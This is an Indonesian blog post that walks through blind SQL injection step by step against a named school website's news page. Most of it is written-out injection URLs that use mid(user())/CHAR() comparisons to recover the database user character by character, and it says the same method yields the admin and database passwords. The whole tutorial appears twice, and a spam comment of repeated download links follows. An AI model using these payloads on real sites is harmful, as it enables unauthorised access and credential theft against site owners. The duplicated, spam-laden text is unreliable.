Blind Sql Injection Step By Step
Tag
hacking
Blind SQL Injection adalah :
salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut.
disini saya memakai command :
mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter
sebelum kita mencobanya, pertama cek dulu version sql nya .. bagi yang belom tau caranya silahkan baca postingan saya sebelumnya disini. kalau versionya 5 maka kita bisa menggunakan teknik sql injection biasa seperti yang ada di postingan saya sebelumnya (disini). tapi kalau version 4 maka kita harus menggunakan cara blnd sql injection yang tentunya juga membutuhkan kesabaran bagi attacker.
kali ini saya akan mengambil target www.smanti.com .
pertama kita lakukan dulu pengetesan bug dengan cara menambahkan value 1=0 dan 1=1 .
www.smanti.com/berita.php?id=5 and 1=0 <<<false
www.smanti.com/berita.php?id=5 and 1=1 <<<true
wah ternyata ada bug nya ... heheh !
2.BLIND INJECT
Query yg dipakai: and mid(user(),1,1)=CHAR(65)
saya jelaskan sedikit deh..
mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut
sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...
mari kita masukkan
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)
ternyata hasilnya masih false (beritanya hilang),berarti value yg kita masukkan salah..
tinggal tambah value nya.menjadi..
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..
dst sampe kita menemukan keadaan true(beritanya muncul kembali)
kebetulan ada di char(83)
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) <<akhirnya true..
kita tambain value nya..
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
adakah perbedaan nya?
yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..
gini nih..
1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)
dst.. sampe dpet yg true..
ternyata yg true ada di value 77
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)
lanjutin trus langkahnya..
cari value ke-3 user..
www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)
eh langsung ktemu..hehehe..
lanjut value ke-4..
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)
ternyata ktemu di value 78..
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)
lanjutkan...
pokoknya,setelah dapat smua,kita convert char yang tadi di ke ascii table
www.piclist.com/techref/ascii.htm
ternyata stelah di convert, 83 77 65 78 hasilnya adalah SMAN
udah hampir tertebak kan sobat ?? hehhe !!! ok silahkan lanjutkan ,,
kalau mau dapet passwordnya kita rubah valuenya
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..
jadi
www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)
cari terus seperti cara tadi, yang penting kita memang harus extra sabar.
dan rubah value database() untuk mencari value lainnya..
hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)
akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...
ok sekian dulu ya sobat !!! moga bisa membantu .. :-)
salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut.
disini saya memakai command :
mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter
sebelum kita mencobanya, pertama cek dulu version sql nya .. bagi yang belom tau caranya silahkan baca postingan saya sebelumnya disini. kalau versionya 5 maka kita bisa menggunakan teknik sql injection biasa seperti yang ada di postingan saya sebelumnya (disini). tapi kalau version 4 maka kita harus menggunakan cara blnd sql injection yang tentunya juga membutuhkan kesabaran bagi attacker.
kali ini saya akan mengambil target www.smanti.com .
pertama kita lakukan dulu pengetesan bug dengan cara menambahkan value 1=0 dan 1=1 .
www.smanti.com/berita.php?id=5 and 1=0 <<<false
www.smanti.com/berita.php?id=5 and 1=1 <<<true
wah ternyata ada bug nya ... heheh !
2.BLIND INJECT
Query yg dipakai: and mid(user(),1,1)=CHAR(65)
saya jelaskan sedikit deh..
mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut
sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...
mari kita masukkan
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)
ternyata hasilnya masih false (beritanya hilang),berarti value yg kita masukkan salah..
tinggal tambah value nya.menjadi..
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..
dst sampe kita menemukan keadaan true(beritanya muncul kembali)
kebetulan ada di char(83)
www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) <<akhirnya true..
kita tambain value nya..
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
adakah perbedaan nya?
yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..
gini nih..
1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)
dst.. sampe dpet yg true..
ternyata yg true ada di value 77
www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)
lanjutin trus langkahnya..
cari value ke-3 user..
www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)
eh langsung ktemu..hehehe..
lanjut value ke-4..
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)
ternyata ktemu di value 78..
www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)
lanjutkan...
pokoknya,setelah dapat smua,kita convert char yang tadi di ke ascii table
www.piclist.com/techref/ascii.htm
ternyata stelah di convert, 83 77 65 78 hasilnya adalah SMAN
udah hampir tertebak kan sobat ?? hehhe !!! ok silahkan lanjutkan ,,
kalau mau dapet passwordnya kita rubah valuenya
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..
jadi
www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)
cari terus seperti cara tadi, yang penting kita memang harus extra sabar.
dan rubah value database() untuk mencari value lainnya..
hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)
akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...
ok sekian dulu ya sobat !!! moga bisa membantu .. :-)
Langganan:
Posting Komentar (Atom)
1 komentar:
Dhongok'S Blog: Blind Sql Injection Step By Step >>>>> Download Now
>>>>> Download Full
Dhongok'S Blog: Blind Sql Injection Step By Step >>>>> Download LINK
>>>>> Download Now
Dhongok'S Blog: Blind Sql Injection Step By Step >>>>> Download Full
>>>>> Download LINK
Posting Komentar